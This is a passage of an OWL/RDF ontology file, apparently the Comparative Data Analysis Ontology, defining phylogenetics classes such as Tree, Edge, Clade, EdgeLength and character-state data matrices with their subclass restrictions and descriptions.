<owl:minCardinality rdf:datatype="&xsd;nonNegativeInteger">3</owl:minCardinality>
</owl:Restriction>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<owl:disjointWith rdf:resource="&obo;CDAO_0000124"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000043 -->
<owl:Class rdf:about="&obo;CDAO_0000043">
<rdfs:label rdf:datatype="&xsd;string">PolymorphicStateDomain</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000091"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000216"/>
<owl:hasValue rdf:datatype="&xsd;float">1.0</owl:hasValue>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000044 -->
<owl:Class rdf:about="&obo;CDAO_0000044">
<rdfs:label rdf:datatype="&xsd;string">TreeAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000157"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000110"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000045 -->
<owl:Class rdf:about="&obo;CDAO_0000045">
<rdfs:label rdf:datatype="&xsd;string">Standard</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000046 -->
<owl:Class rdf:about="&obo;CDAO_0000046">
<rdfs:label rdf:datatype="&xsd;string">EdgeLength</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000101"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000176"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000063"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000215"/>
<owl:someValuesFrom rdf:resource="&rdfs;Literal"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:comment>Its possible that this should not be classed as an 'annotation' since it contains data rather than meta-data.</rdfs:comment>
<dc:description>The length of an edge (branch) of a Tree or Network, typically in units of evolutionary changes in character-state per character.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000047 -->
<owl:Class rdf:about="&obo;CDAO_0000047">
<rdfs:label rdf:datatype="&xsd;string">RibonucleotideResidue</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000034"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000048 -->
<owl:Class rdf:about="&obo;CDAO_0000048">
<rdfs:label rdf:datatype="&xsd;string">Clade</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000129"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000049 -->
<owl:Class rdf:about="&obo;CDAO_0000049">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharParsimonyLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000050 -->
<owl:Class rdf:about="&obo;CDAO_0000050">
<rdfs:label rdf:datatype="&xsd;string">MolecularStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000089"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000051 -->
<owl:Class rdf:about="&obo;CDAO_0000051">
<rdfs:label rdf:datatype="&xsd;string">PolyphyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000188"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
<owl:disjointWith rdf:resource="&obo;CDAO_0000127"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000052 -->
<owl:Class rdf:about="&obo;CDAO_0000052">
<rdfs:label rdf:datatype="&xsd;string">NexusDataBlock</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000053 -->
<owl:Class rdf:about="&obo;CDAO_0000053">
<rdfs:label rdf:datatype="&xsd;string">BranchingNode</rdfs:label>
<owl:equivalentClass>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000177"/>
<owl:minCardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:minCardinality>
</owl:Restriction>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000055 -->
<owl:Class rdf:about="&obo;CDAO_0000055">
<rdfs:label rdf:datatype="&xsd;string">Compound</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000039"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000056 -->
<owl:Class rdf:about="&obo;CDAO_0000056">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000025"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000208"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000138"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000142"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000071"/>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A matrix of character-state data, typically containing observed data, though in some cases the states in the matrix might be simulated or hypothetical. Synonyms: character Data matrix, character-state matrix</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000057 -->
<owl:Class rdf:about="&obo;CDAO_0000057">
<rdfs:label rdf:datatype="&xsd;string">RibonucleotideResidueStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000050"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000058 -->
<owl:Class rdf:about="&obo;CDAO_0000058">
<rdfs:label rdf:datatype="&xsd;string">TimeCalibratedLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000059 -->
<owl:Class rdf:about="&obo;CDAO_0000059">
<rdfs:label rdf:datatype="&xsd;string">SetOfNodes</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000118"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000198"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000140"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000060 -->
<owl:Class rdf:about="&obo;CDAO_0000060">
<rdfs:label rdf:datatype="&xsd;string">MRCANode</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000080"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000163"/>
<owl:onClass rdf:resource="&obo;CDAO_0000118"/>
<owl:minQualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:minQualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000061 -->
<owl:Class rdf:about="&obo;CDAO_0000061">
<rdfs:label rdf:datatype="&xsd;string">FASTADataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000062 -->
<owl:Class rdf:about="&obo;CDAO_0000062">
<rdfs:label rdf:datatype="&xsd;string">evolutionaryTransition</rdfs:label>
<owl:equivalentClass rdf:resource="&obo;CDAO_0000065"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000097"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000159"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000186"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000169"/>
<owl:onClass rdf:resource="&obo;CDAO_0000071"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000063 -->
<owl:Class rdf:about="&obo;CDAO_0000063">
<rdfs:label rdf:datatype="&xsd;string">EdgeLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000064 -->
<owl:Class rdf:about="&obo;CDAO_0000064">
<rdfs:label rdf:datatype="&xsd;string">cladogeneticChange</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000097"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000065 -->
<owl:Class rdf:about="&obo;CDAO_0000065">
<rdfs:label rdf:datatype="&xsd;string">anageneticChange</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000097"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000066 -->
<owl:Class rdf:about="&obo;CDAO_0000066">
<rdfs:label rdf:datatype="&xsd;string">TUAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000067 -->
<owl:Class rdf:about="&obo;CDAO_0000067">
<rdfs:label rdf:datatype="&xsd;string">PhyloTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000068 -->
<owl:Class rdf:about="&obo;CDAO_0000068">
<rdfs:label rdf:datatype="&xsd;string">ContinuousCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000071"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000207"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000019"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000019"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000069 -->
<owl:Class rdf:about="&obo;CDAO_0000069">
<rdfs:label rdf:datatype="&xsd;string">PHYLIPTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000070 -->
<owl:Class rdf:about="&obo;CDAO_0000070">
<rdfs:label rdf:datatype="&xsd;string">Subtree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000155"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000110"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000071 -->
<owl:Class rdf:about="&obo;CDAO_0000071">
<rdfs:label rdf:datatype="&xsd;string">Character</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000098"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:comment rdf:datatype="&xsd;string">Traits shown to be relevant for phylogenetic classification</rdfs:comment>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000072 -->
<owl:Class rdf:about="&obo;CDAO_0000072">
<rdfs:label rdf:datatype="&xsd;string">GalledTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000073 -->
<owl:Class rdf:about="&obo;CDAO_0000073">
<rdfs:label rdf:datatype="&xsd;string">SpeciesTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000074 -->
<owl:Class rdf:about="&obo;CDAO_0000074">
<rdfs:label rdf:datatype="&xsd;string">TreeFormat</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000044"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000075 -->
<owl:Class rdf:about="&obo;CDAO_0000075">
<rdfs:label rdf:datatype="&xsd;string">StandardCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000111"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000076 -->
<owl:Class rdf:about="&obo;CDAO_0000076">
<rdfs:label rdf:datatype="&xsd;string">AminoAcidResidue</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000034"/>
<dc:description>This class will be declared equivalent ot the amino acid class description imported</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000077 -->
<owl:Class rdf:about="&obo;CDAO_0000077">
<rdfs:label rdf:datatype="&xsd;string">geneDuplication</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000064"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000078 -->
<owl:Class rdf:about="&obo;CDAO_0000078">
<rdfs:label rdf:datatype="&xsd;string">CompoundCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000111"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000170"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000136"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000142"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000071"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000136"/>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>A character that could be divided into separate characters but is not due to the non-independence of changes that would result, e.g., as in the case of a subsequence that is either present or absent as a block.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000079 -->
<owl:Class rdf:about="&obo;CDAO_0000079">
<rdfs:label rdf:datatype="&xsd;string">SIMMAPTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000080 -->
<owl:Class rdf:about="&obo;CDAO_0000080">
<rdfs:label rdf:datatype="&xsd;string">CommonAncestralNode</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000026"/>
<rdfs:subClassOf>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000053"/>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000174"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000053"/>
</owl:Restriction>
</owl:unionOf>
</owl:Class>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000081 -->
<owl:Class rdf:about="&obo;CDAO_0000081">
<rdfs:label rdf:datatype="&xsd;string">NewickTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000074"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000082 -->
<owl:Class rdf:about="&obo;CDAO_0000082">
<rdfs:label rdf:datatype="&xsd;string">TimeProportionalLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000083 -->
<owl:Class rdf:about="&obo;CDAO_0000083">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharDistanceLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000084 -->
<owl:Class rdf:about="&obo;CDAO_0000084">
<rdfs:label rdf:datatype="&xsd;string">StarTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000149"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000108"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000085 -->
<owl:Class rdf:about="&obo;CDAO_0000085">
<rdfs:label rdf:datatype="&xsd;string">FullyResolvedUnrootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000018"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000088"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000086 -->
<owl:Class rdf:about="&obo;CDAO_0000086">
<rdfs:label rdf:datatype="&xsd;string">ParaphyleticGroup</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000127"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000199"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000070"/>
</owl:Restriction>
</rdfs:subClassOf>
<owl:disjointWith rdf:resource="&obo;CDAO_0000129"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000087 -->
<owl:Class rdf:about="&obo;CDAO_0000087">
<rdfs:label rdf:datatype="&xsd;string">geneticEvent</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000041"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000088 -->
<owl:Class rdf:about="&obo;CDAO_0000088">
<rdfs:label rdf:datatype="&xsd;string">UnrootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000110"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000089 -->
<owl:Class rdf:about="&obo;CDAO_0000089">
<rdfs:label rdf:datatype="&xsd;string">CategoricalStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000098"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000090 -->
<owl:Class rdf:about="&obo;CDAO_0000090">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharLikelihoodLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000100"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000091 -->
<owl:Class rdf:about="&obo;CDAO_0000091">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDomain</rdfs:label>
<dc:description>The universe of possible states for a particular type of character, e.g., the states of an Amino_Acid character come from the Amino_Acid domain.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000092 -->
<owl:Class rdf:about="&obo;CDAO_0000092">
<rdfs:label rdf:datatype="&xsd;string">CoordinateList</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000022"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000093 -->
<owl:Class rdf:about="&obo;CDAO_0000093">
<rdfs:label rdf:datatype="&xsd;string">GammaDistribution</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000020"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000094 -->
<owl:Class rdf:about="&obo;CDAO_0000094">
<rdfs:label rdf:datatype="&xsd;string">DesoxiRibonucleotideResidueCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000115"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000195"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000002"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000002"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000095 -->
<owl:Class rdf:about="&obo;CDAO_0000095">
<rdfs:label rdf:datatype="&xsd;string">CoordinateRange</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000022"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000096 -->
<owl:Class rdf:about="&obo;CDAO_0000096">
<rdfs:label rdf:datatype="&xsd;string">ReticulateEvolution</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000097 -->
<owl:Class rdf:about="&obo;CDAO_0000097">
<rdfs:label rdf:datatype="&xsd;string">hereditaryChange</rdfs:label>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000186"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000159"/>
<owl:onClass rdf:resource="&obo;CDAO_0000091"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000169"/>
<owl:onClass rdf:resource="&obo;CDAO_0000071"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000098 -->
<owl:Class rdf:about="&obo;CDAO_0000098">
<rdfs:label rdf:datatype="&xsd;string">CharacterStateDatum</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000205"/>
<owl:onClass rdf:resource="&obo;CDAO_0000071"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000191"/>
<owl:onClass rdf:resource="&obo;CDAO_0000138"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">1</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>The instance of a given character for a given TU. Its state is an object property drawn from a particular character state domain, e.g., the state of an Amino_Acid_State_Datum is an object property drawn from the domain Amino_Acid.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000099 -->
<owl:Class rdf:about="&obo;CDAO_0000099">
<rdfs:label rdf:datatype="&xsd;string">Edge</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000193"/>
<owl:someValuesFrom rdf:resource="&obo;CDAO_0000101"/>
</owl:Restriction>
</rdfs:subClassOf>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000162"/>
<owl:onClass rdf:resource="&obo;CDAO_0000140"/>
<owl:qualifiedCardinality rdf:datatype="&xsd;nonNegativeInteger">2</owl:qualifiedCardinality>
</owl:Restriction>
</rdfs:subClassOf>
<dc:description>An edge connecting two nodes in a (Phylogenetic) Tree or Network, also known as a 'branch'. Edges may have attributes such as length, degree of support, and direction. An edge can be a surrogate for a 'split' or bipartition, since each edge in a tree divides the terminal nodes into two sets.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000100 -->
<owl:Class rdf:about="&obo;CDAO_0000100">
<rdfs:label rdf:datatype="&xsd;string">DiscreteCharacterLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000101 -->
<owl:Class rdf:about="&obo;CDAO_0000101">
<rdfs:label rdf:datatype="&xsd;string">EdgeAnnotation</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000040"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000102 -->
<owl:Class rdf:about="&obo;CDAO_0000102">
<rdfs:label rdf:datatype="&xsd;string">FullyResolvedRootedTree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000012"/>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000018"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000178"/>
<owl:allValuesFrom>
<owl:Class>
<owl:unionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000033"/>
<rdf:Description rdf:about="&obo;CDAO_0000099"/>
<rdf:Description rdf:about="&obo;CDAO_0000108"/>
</owl:unionOf>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000103 -->
<owl:Class rdf:about="&obo;CDAO_0000103">
<rdfs:label rdf:datatype="&xsd;string">GrafenLengthType</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000063"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000104 -->
<owl:Class rdf:about="&obo;CDAO_0000104">
<rdfs:label rdf:datatype="&xsd;string">CoordinateSystem</rdfs:label>
<rdfs:subClassOf rdf:resource="&owl;Thing"/>
<dc:description>A reference to an external coordinate system. Coordinates for data must refer to some such external coordinate system.</dc:description>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000105 -->
<owl:Class rdf:about="&obo;CDAO_0000105">
<rdfs:label rdf:datatype="&xsd;string">GenBankDataMatrix</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000107"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000107 -->
<owl:Class rdf:about="&obo;CDAO_0000107">
<rdfs:label rdf:datatype="&xsd;string">DataMatrixFormat</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000025"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000108 -->
<owl:Class rdf:about="&obo;CDAO_0000108">
<rdfs:label rdf:datatype="&xsd;string">TerminalNode</rdfs:label>
<owl:equivalentClass>
<owl:Class>
<owl:intersectionOf rdf:parseType="Collection">
<rdf:Description rdf:about="&obo;CDAO_0000140"/>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000149"/>
<owl:allValuesFrom>
<owl:Class>
<owl:complementOf rdf:resource="&obo;CDAO_0000140"/>
</owl:Class>
</owl:allValuesFrom>
</owl:Restriction>
</owl:intersectionOf>
</owl:Class>
</owl:equivalentClass>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000140"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000109 -->
<owl:Class rdf:about="&obo;CDAO_0000109">
<rdfs:label rdf:datatype="&xsd;string">RibonucleotideResidueCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000115"/>
<rdfs:subClassOf>
<owl:Restriction>
<owl:onProperty rdf:resource="&obo;CDAO_0000153"/>
<owl:allValuesFrom rdf:resource="&obo;CDAO_0000057"/>
</owl:Restriction>
</rdfs:subClassOf>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000110 -->
<owl:Class rdf:about="&obo;CDAO_0000110">
<rdfs:label rdf:datatype="&xsd;string">Tree</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000006"/>
</owl:Class>
<!-- http://purl.obolibrary.org/obo/CDAO_0000111 -->
<owl:Class rdf:about="&obo;CDAO_0000111">
<rdfs:label rdf:datatype="&xsd;string">CategoricalCharacter</rdfs:label>
<rdfs:subClassOf rdf:resource="&obo;CDAO_0000071"/>
</owl:Class>
